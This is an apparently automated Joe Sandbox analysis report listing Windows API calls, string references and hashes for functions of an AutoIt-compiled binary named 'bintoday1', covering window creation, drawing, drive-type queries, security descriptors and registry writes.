SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C12CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C12CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12CF8
GetClientRect.USER32(00000000,?), ref: 00C12D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C12D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12DA8
GlobalFree.KERNEL32(00000000), ref: 00C12DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C2FC38,00000000), ref: 00C12DDB
GlobalFree.KERNEL32(00000000), ref: 00C12DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C12E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C12E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C12E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C1303F

Strings

static, xrefs: 00C12D3A, 00C12E91
AutoIt v3, xrefs: 00C12CF2
DISPLAY, xrefs: 00C12EA2
, xrefs: 00C12FC5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 72f7131b9c4539807ef932a787d08783166cbc451dffe9e454c05e4b99a97b2c
Instruction ID: f8dfb43032775f518a0d8a4263a55fcb4f97f02d5ff4e1165cba133b2026640e
Opcode Fuzzy Hash: 72f7131b9c4539807ef932a787d08783166cbc451dffe9e454c05e4b99a97b2c
Instruction Fuzzy Hash: CC025875910214EFDB24DFA4CC89FAE7BB9EB49711F048158F915AB2A1CB70ED42CB60

Function 00C270D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C2712F
GetSysColorBrush.USER32(0000000F), ref: 00C27160
GetSysColor.USER32(0000000F), ref: 00C2716C
SetBkColor.GDI32(?,000000FF), ref: 00C27186
SelectObject.GDI32(?,?), ref: 00C27195
InflateRect.USER32(?,000000FF,000000FF), ref: 00C271C0
GetSysColor.USER32(00000010), ref: 00C271C8
CreateSolidBrush.GDI32(00000000), ref: 00C271CF
FrameRect.USER32(?,?,00000000), ref: 00C271DE
DeleteObject.GDI32(00000000), ref: 00C271E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00C27230
FillRect.USER32(?,?,?), ref: 00C27262
GetWindowLongW.USER32(?,000000F0), ref: 00C27284

Part of subcall function 00C273E8: GetSysColor.USER32(00000012), ref: 00C27421
Part of subcall function 00C273E8: SetTextColor.GDI32(?,?), ref: 00C27425
Part of subcall function 00C273E8: GetSysColorBrush.USER32(0000000F), ref: 00C2743B
Part of subcall function 00C273E8: GetSysColor.USER32(0000000F), ref: 00C27446
Part of subcall function 00C273E8: GetSysColor.USER32(00000011), ref: 00C27463
Part of subcall function 00C273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C27471
Part of subcall function 00C273E8: SelectObject.GDI32(?,00000000), ref: 00C27482
Part of subcall function 00C273E8: SetBkColor.GDI32(?,00000000), ref: 00C2748B
Part of subcall function 00C273E8: SelectObject.GDI32(?,?), ref: 00C27498
Part of subcall function 00C273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00C274B7
Part of subcall function 00C273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C274CE
Part of subcall function 00C273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C274DB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 5c1e140527df936ac6ce0ea440d05b6ed7f05abebea3e5a74ba5316d00c67366
Instruction ID: f768c2c52e019e5d441b7136276355b06af64b81f9da3463154c4fd55ed5819d
Opcode Fuzzy Hash: 5c1e140527df936ac6ce0ea440d05b6ed7f05abebea3e5a74ba5316d00c67366
Instruction Fuzzy Hash: 1DA19D72018311EFDB209F64DC88B6E7BA9FF49320F100B29F962965E1D770E945DB92

Function 00C12711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C1273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C1286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C128A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C128B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C12900
GetClientRect.USER32(00000000,?), ref: 00C1290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C12955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C12964
GetStockObject.GDI32(00000011), ref: 00C12974
SelectObject.GDI32(00000000,00000000), ref: 00C12978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C12988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C12991
DeleteDC.GDI32(00000000), ref: 00C1299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C129C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C129DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C12A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C12A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C12A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C12A77
GetStockObject.GDI32(00000011), ref: 00C12A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C12A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C12A97

Strings

AutoIt v3, xrefs: 00C128F8
static, xrefs: 00C1294F, 00C12A71
DISPLAY, xrefs: 00C1295A
msctls_progress32, xrefs: 00C12A13

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 997182844294858e2b96e736e9cb700da65f551fde973889478b247a78346eb9
Instruction ID: 32fb6fb058f607b58b0165182842eafafe86379c7530c48eb0711abfd4dae60c
Opcode Fuzzy Hash: 997182844294858e2b96e736e9cb700da65f551fde973889478b247a78346eb9
Instruction Fuzzy Hash: 49B17D75A10205AFEB20DF68DC8AFAE7BA9EB08711F048154F915E72E0D770ED41CB94

Function 00C04ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C04AED
GetDriveTypeW.KERNEL32(?,00C2CB68,?,\\.\,00C2CC08), ref: 00C04BCA
SetErrorMode.KERNEL32(00000000,00C2CB68,?,\\.\,00C2CC08), ref: 00C04D36

Strings

RAMDisk, xrefs: 00C04BF4
SSD, xrefs: 00C04C4A
\\.\, xrefs: 00C04B3F
Fixed, xrefs: 00C04C09
SCSI, xrefs: 00C04C8A
SAS, xrefs: 00C04CC9
ATA, xrefs: 00C04C98
FileBackedVirtual, xrefs: 00C04CEC
iSCSI, xrefs: 00C04CC2
Removable, xrefs: 00C04C10, 00C04C15
SATA, xrefs: 00C04CD0
1394, xrefs: 00C04C9F
Fibre, xrefs: 00C04CAD
MMC, xrefs: 00C04CDE
RAID, xrefs: 00C04CBB
Network, xrefs: 00C04C02
CDROM, xrefs: 00C04BFB
SSA, xrefs: 00C04CA6
USB, xrefs: 00C04CB4
ATAPI, xrefs: 00C04C91
Unknown, xrefs: 00C04BED, 00C04C83
PhysicalDrive, xrefs: 00C04B76
Virtual, xrefs: 00C04CE5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 57ec17061fffc9b675de26155f9f1b33b9fd58ee2d557201a0591f22a1cc4abe
Instruction ID: 401c342b673a0776a3e3e22828f493172e7fd7aa8393ff55224c6ad48a323551
Opcode Fuzzy Hash: 57ec17061fffc9b675de26155f9f1b33b9fd58ee2d557201a0591f22a1cc4abe
Instruction Fuzzy Hash: 9761F2B4205205EBDB0CDF24CA8297E77B0EB04701B648469FE06AB2D1CB31EE85DB45

Function 00C273E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C27421
SetTextColor.GDI32(?,?), ref: 00C27425
GetSysColorBrush.USER32(0000000F), ref: 00C2743B
GetSysColor.USER32(0000000F), ref: 00C27446
CreateSolidBrush.GDI32(?), ref: 00C2744B
GetSysColor.USER32(00000011), ref: 00C27463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C27471
SelectObject.GDI32(?,00000000), ref: 00C27482
SetBkColor.GDI32(?,00000000), ref: 00C2748B
SelectObject.GDI32(?,?), ref: 00C27498
InflateRect.USER32(?,000000FF,000000FF), ref: 00C274B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C274CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00C274DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C2752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C27554
InflateRect.USER32(?,000000FD,000000FD), ref: 00C27572
DrawFocusRect.USER32(?,?), ref: 00C2757D
GetSysColor.USER32(00000011), ref: 00C2758E
SetTextColor.GDI32(?,00000000), ref: 00C27596
DrawTextW.USER32(?,00C270F5,000000FF,?,00000000), ref: 00C275A8
SelectObject.GDI32(?,?), ref: 00C275BF
DeleteObject.GDI32(?), ref: 00C275CA
SelectObject.GDI32(?,?), ref: 00C275D0
DeleteObject.GDI32(?), ref: 00C275D5
SetTextColor.GDI32(?,?), ref: 00C275DB
SetBkColor.GDI32(?,?), ref: 00C275E5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 09fca472a4d283ea0b7dcf3af9a02e60b050ff2a5301f5338e8dd0496b5a8653
Instruction ID: 8bf4ca1c2fc3db4addeb95c166f61cecdb7e4d0499d2be0412a36bcd3d6ef7ee
Opcode Fuzzy Hash: 09fca472a4d283ea0b7dcf3af9a02e60b050ff2a5301f5338e8dd0496b5a8653
Instruction Fuzzy Hash: 5B616F72900218AFDB119FA4DC89BAEBFB9EF08320F104225F911AB6A1D7749941DF90

Function 00C20FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C21128
GetDesktopWindow.USER32 ref: 00C2113D
GetWindowRect.USER32(00000000), ref: 00C21144
GetWindowLongW.USER32(?,000000F0), ref: 00C21199
DestroyWindow.USER32(?), ref: 00C211B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C211ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C2120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C2121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00C21232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C21245
IsWindowVisible.USER32(00000000), ref: 00C212A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C212BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C212D0
GetWindowRect.USER32(00000000,?), ref: 00C212E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00C2130E
GetMonitorInfoW.USER32(00000000,?), ref: 00C21328
CopyRect.USER32(?,?), ref: 00C2133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00C213AA

Strings

0, xrefs: 00C210D3
tooltips_class32, xrefs: 00C211E6
(, xrefs: 00C2131B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f6259a65920a76486cfeca2d07690e5c20a8bbe44ccabc0bd923074305f66c37
Instruction ID: 8681c79312dabea3c8ab53693c8af9468dd04bf45dc6bc77197e79befae44b88
Opcode Fuzzy Hash: f6259a65920a76486cfeca2d07690e5c20a8bbe44ccabc0bd923074305f66c37
Instruction Fuzzy Hash: C5B1A971608350AFDB10DF64D884B6EBBE5FF98350F04891CF9999B2A1CB31E945CB92

Function 00C20241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C202E5
_wcslen.LIBCMT ref: 00C2031F
_wcslen.LIBCMT ref: 00C20389
_wcslen.LIBCMT ref: 00C203F1
_wcslen.LIBCMT ref: 00C20475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C204C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C20504

Part of subcall function 00BAF9F2: _wcslen.LIBCMT ref: 00BAF9FD

Part of subcall function 00BF223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BF2258
Part of subcall function 00BF223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BF228A

Strings

GETITEMCOUNT, xrefs: 00C20316, 00C20337
SELECTINVERT, xrefs: 00C2057E
FINDITEM, xrefs: 00C20627
GETSUBITEMCOUNT, xrefs: 00C20384, 00C2039F
GETTEXT, xrefs: 00C203EC, 00C20407
VIEWCHANGE, xrefs: 00C20675
SELECTCLEAR, xrefs: 00C2052D
DESELECT, xrefs: 00C2059C
SELECTALL, xrefs: 00C20515
ISSELECTED, xrefs: 00C204DD
GETSELECTEDCOUNT, xrefs: 00C20470, 00C2048B
SELECT, xrefs: 00C20548
GETSELECTED, xrefs: 00C205E1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: bedef373ee9c18059b22c6947c047e818643578376d2e6f97d0730fdfe619f56
Instruction ID: 3bf6af4aa551db35da4e68429c21a09861eafa663fd6407aaa43e92b5a8b7ad9
Opcode Fuzzy Hash: bedef373ee9c18059b22c6947c047e818643578376d2e6f97d0730fdfe619f56
Instruction Fuzzy Hash: 6EE1C3312182118FCB14DF24D59193EB7E5FF98314B2445AEF8A69BBA2DB30EE45CB41

Function 00BA8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BA8968
GetSystemMetrics.USER32(00000007), ref: 00BA8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BA899B
GetSystemMetrics.USER32(00000008), ref: 00BA89A3
GetSystemMetrics.USER32(00000004), ref: 00BA89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BA89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BA89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BA8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BA8A3C
GetClientRect.USER32(00000000,000000FF), ref: 00BA8A5A
GetStockObject.GDI32(00000011), ref: 00BA8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA8A81

Part of subcall function 00BA912D: GetCursorPos.USER32(?), ref: 00BA9141
Part of subcall function 00BA912D: ScreenToClient.USER32(00000000,?), ref: 00BA915E
Part of subcall function 00BA912D: GetAsyncKeyState.USER32(00000001), ref: 00BA9183
Part of subcall function 00BA912D: GetAsyncKeyState.USER32(00000002), ref: 00BA919D

SetTimer.USER32(00000000,00000000,00000028,00BA90FC), ref: 00BA8AA8

Strings

AutoIt v3 GUI, xrefs: 00BA8A20

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b4327c28c61efd5a6add1970c3664ff38e5624e60c8395d1679ddd05c74b3ddb
Instruction ID: 8ed374d461e569a7b567b8472653a953c6f6e982a5bf056725cc4a70da2899dd
Opcode Fuzzy Hash: b4327c28c61efd5a6add1970c3664ff38e5624e60c8395d1679ddd05c74b3ddb
Instruction Fuzzy Hash: 7AB16971A002099FDB24DFA9CC85BAE3BF5FB48315F144269FA15E7290DB74E841CB51

Function 00BF0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BF1114
Part of subcall function 00BF10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF1120
Part of subcall function 00BF10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF112F
Part of subcall function 00BF10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF1136
Part of subcall function 00BF10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BF114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BF0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BF0E29
GetLengthSid.ADVAPI32(?), ref: 00BF0E40
GetAce.ADVAPI32(?,00000000,?), ref: 00BF0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BF0E96
GetLengthSid.ADVAPI32(?), ref: 00BF0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00BF0EB5
HeapAlloc.KERNEL32(00000000), ref: 00BF0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BF0EDD
CopySid.ADVAPI32(00000000), ref: 00BF0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BF0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BF0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BF0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF0F6E
HeapFree.KERNEL32(00000000), ref: 00BF0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF0F7E
HeapFree.KERNEL32(00000000), ref: 00BF0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF0F8E
HeapFree.KERNEL32(00000000), ref: 00BF0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00BF0FA1
HeapFree.KERNEL32(00000000), ref: 00BF0FA8

Part of subcall function 00BF1193: GetProcessHeap.KERNEL32(00000008,00BF0BB1,?,00000000,?,00BF0BB1,?), ref: 00BF11A1
Part of subcall function 00BF1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00BF0BB1,?), ref: 00BF11A8
Part of subcall function 00BF1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00BF0BB1,?), ref: 00BF11B7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 50b0bb2959ede92500b7a2abc0d82637b68b40398be7d1f1d043b76877c51696
Instruction ID: c1b821d5958f4bc1bc87e9e32748f672b90d6c3810afda4764481de6300f81ca
Opcode Fuzzy Hash: 50b0bb2959ede92500b7a2abc0d82637b68b40398be7d1f1d043b76877c51696
Instruction Fuzzy Hash: 6D714D7291020AEBDF20AFA4DC45FBEBBB8FF04310F144555FA19A71A2D771991ACB60

Function 00C1C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C1C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C2CC08,00000000,?,00000000,?,?), ref: 00C1C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C1C5A4
_wcslen.LIBCMT ref: 00C1C5F4
_wcslen.LIBCMT ref: 00C1C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C1C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C1C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C1C84D
RegCloseKey.ADVAPI32(?), ref: 00C1C881
RegCloseKey.ADVAPI32(00000000), ref: 00C1C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C1C960

Strings

REG_SZ, xrefs: 00C1C644
REG_MULTI_SZ, xrefs: 00C1C6F5
